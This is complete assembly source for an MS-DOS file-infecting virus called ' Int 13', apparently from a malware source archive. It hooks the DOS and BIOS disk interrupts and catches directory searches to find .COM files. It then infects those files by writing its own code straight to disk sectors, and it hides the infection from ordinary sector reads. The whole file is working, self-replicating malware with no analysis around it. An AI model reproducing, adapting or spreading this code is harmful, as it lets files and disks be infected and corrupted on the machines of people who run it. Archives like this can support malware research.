vxug-MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.int13.asm

Code		Segment
		Assume	CS:Code

Old13		=	9Ch
True13		=	9Dh
Saved21		=	9Eh
Temp13		=	9Fh

VStart:		loop	Next	; Virus ID
Next:		push	ax
		mov	di,13h * 4
		push	di
		xor	bp,bp
		mov	ds,bp
		les	bx,[di]
		mov	di,True13 * 4
		mov	[di-4],bx
		mov	[di-2],es
		mov	ah,13h
		int	2Fh
		push	es
		push	bx
		int	2Fh
		mov	es,bp
		mov	si,21h * 4
		pop	ax
		stosw
		pop	ax
		stosw
		push	si
		movsw
		movsw
		mov	ah,52h
		int	21h
		push	es
		pop	ds
		les	ax,[bx+12h]	; ax is now 0000h, i.e. ah is 0.
		push	word ptr es:[bp+2]
		mov	si,100h
		mov	cx,si
		mov	di,bp
		push	si
	rep	movs	word ptr es:[di], cs:[si]
		pop	si
		pop	word ptr ds:[bx+14h]
		push	es
		mov	al, offset Continue	; Let's use it!
		push	ax
		retf

SavedCX		dw	1
SavedDX		dw	0
SavedBX		dw	0
SavedES		dw	0

FileWord	dw	0

SCX		=	offset SavedCX - offset VStart
SDX		=	offset SavedDX - offset VStart

Continue:	mov	es,bp
		pop	di
		mov	al,offset Int21		; Two times!
		stosw
		mov	es:[di],cs
		pop	di
		mov	al,offset Int13		; Three times!
		stosw
		mov	es:[di],cs

		mov	es,[bp+2Ch]	; This assumes SS:
		mov	di,bp
		xchg	ax,bp
		dec	cx
ScanEnv:	repne	scasb
		scasb
		jnz	ScanEnv
		scasw
		push	es
		pop	ds
		mov	dx,di
		mov	ah,3Dh
		int	21h
		jc	NoStart
		mov	dx,si
		xchg	ax,bx
		mov	ah,3Fh
		push	ss
		pop	ds
		int	21h
		mov	ah,3Eh
		int	21h

		pop	ax
		push	ss
		push	si
		push	ss
		pop	es
		retf

NoStart:	mov	ah,4Ch
		int	21h

Int13V:		mov	SavedBX,bx
		mov	SavedCX,cx
		mov	SavedDX,dx
		mov	SavedES,es

Go13:		int	Old13
		jmp	short RetF2

Int13:		cmp	ah,2
		jne	Go13
		push	ds
		push	si
		push	di
		push	cx
		push	dx
		push	es
		push	bx
		push	dx
		int	Old13
		pop	dx
		jc	Exit13
		cmp	word ptr es:[bx],00E2h
		clc
		jne	Exit13
		mov	ax,202h
		mov	cx,es:[bx+SCX]
		mov	dh,byte ptr es:[bx+SDX+1]
		mov	bx,0B800h
		mov	ds,bx
		mov	es,bx
		mov	bh,78h
		int	True13
		jc	Exit13
		mov	si,7A00h
		pop	bx
		mov	di,bx
		pop	es
		mov	cx,100h
	rep	movsw
		jmp	short Exit13_1
Exit13:		pop	bx
		pop	es
Exit13_1:	pop	dx
		pop	cx
		pop	di
		pop	si
		pop	ds
RetF2:		retf	2

Int21:		cmp	ah,12h
		je	FindNext
		int	Saved21
		jmp	RetF2
FindNext:	int	Saved21
		cmp	al,0
		jnz	RetF2
		push	ax
		push	bx
		push	ds
		push	es
		mov	ah,2Fh
		int	Saved21
		push	es
		pop	ds
		mov	ax,'MO'
		cmp	ax,[bx+17]
		jne	Exit1
		cmp	ax,[bx+9]
		je	Exit1
		mov	al,[bx+7]
		add	al,'@'
		push	cx
		push	dx
		mov	cx,[bx+36]
		mov	dx,200h
		cmp	cx,dx
		jb	Exit2
		dec	cx
		test	ch,10b
		jz	Infect
		cmp	al,'C'
		jb	Exit2
		test	ch,100b
		jz	Infect
Exit2:		pop	dx
		pop	cx
Exit1:		pop	es
		pop	ds
		pop	bx
		pop	ax
		jmp	RetF2

Infect:		push	si
		push	di
		push	cs
		pop	es
		mov	di,dx
		lea	si,[bx+8]
		mov	ah,':'
		stosw
		movsw
		movsw
		movsw
		movsw
		mov	al,'.'
		stosb
		movsw
		movsb
		xor	ax,ax
		stosb

		mov	ds,ax
		mov	es,ax
		mov	si,13h * 4
		mov	di,Temp13 * 4

		push	si
		push	di
		push	es

		movsw
		movsw

		mov	word ptr [si-4], offset Int13V
		mov	[si-2], cs

		push	cs
		pop	ds

		mov	ah,3Dh
		int	Saved21
		xchg	ax,bx
		mov	ax,4202h
		mov	cx,-1
		mov	dx,cx
		int	Saved21		; DX must now be zero (.COM)
Go:		mov	ah,3Fh
		mov	dl,offset FileWord
		mov	di,dx
		neg	cx		; mov	cx,1
		int	Saved21
		push	[di-8]
		push	[di-6]
		mov	ax,4200h
		xor	cx,cx		; can it be inc cx ??
		xor	dx,dx
		int	Saved21
		mov	ah,3Fh
		mov	dx,di
		mov	cl,2
		int	Saved21
		mov	ax,[di]
		pop	dx
		pop	cx
		cmp	ax,00E2h
		je	Close
		cmp	ax,5A4Dh
		je	Close
		mov	ax,202h
		push	cx
		push	dx
		mov	bx,0B800h
		mov	es,bx
		mov	bh,78h
		int	True13
		lds	si,[di-4]
		push	di
		mov	di,7A00h
		mov	cx,100h
	rep	movsw
		pop	di
		mov	ax,302h
		pop	dx
		pop	cx
		push	cx
		push	dx
		int	True13
		pop	dx
		pop	cx
		mov	ax,301h
		xchg	cx,cs:[di-8]
		xchg	dx,cs:[di-6]
		push	cs
		pop	es
		xor	bx,bx
		int	True13
Close:		mov	ah,3Eh
		int	Saved21

		pop	es
		pop	si
		pop	di

		movs	word ptr es:[di], es:[si]
		movs	word ptr es:[di], es:[si]

		pop	di
		pop	si
		jmp	Exit2

VName		db	' Int 13'

VEnd		label	byte
VLen		=	offset VEnd - offset VStart

Code		EndS
		End	VStart